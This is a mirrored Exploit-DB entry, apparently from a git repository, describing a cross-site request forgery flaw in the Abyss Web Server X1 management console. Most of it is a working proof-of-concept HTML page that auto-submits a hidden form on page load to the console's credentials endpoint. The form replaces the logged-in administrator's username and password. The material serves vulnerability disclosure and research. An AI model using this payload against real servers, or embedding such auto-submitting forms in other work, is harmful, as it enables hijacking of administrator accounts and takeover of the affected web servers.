bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/webapps/12640.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
1.5 KiB
Text
Raw Permalink Blame History

http://osvdb.org/show/osvdb/64693
<http://osvdb.org/show/osvdb/64693>
http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html
:
Abyss Web Server X1
XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
A cross-site request forgery vunlerability in the Abyss Web Server
X1<http://www.aprelium.com/abyssws/download.php> management
console can be exploited to change both the username and password of the
logged in user.
PoC:
view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
1. <html>
2. <body onload="document.forms[0].submit()">
3. <form method="post" action="
http://localhost:9999/console/credentials">
4. <input type="hidden" name="/console/credentials/login"
5. value="new_username" />
6. <input type="hidden" name=
"/console/credentials/password/$pass1"
7. value="new_password" />
8. <input type="hidden" name=
"/console/credentials/password/$pass2"
9. value="new_password" />
10. <input type="hidden" name="/console/credentials/bok"
11. value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
12. </form>
13. </body>
14. </html>
<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
Reference in a new issue View git blame Copy permalink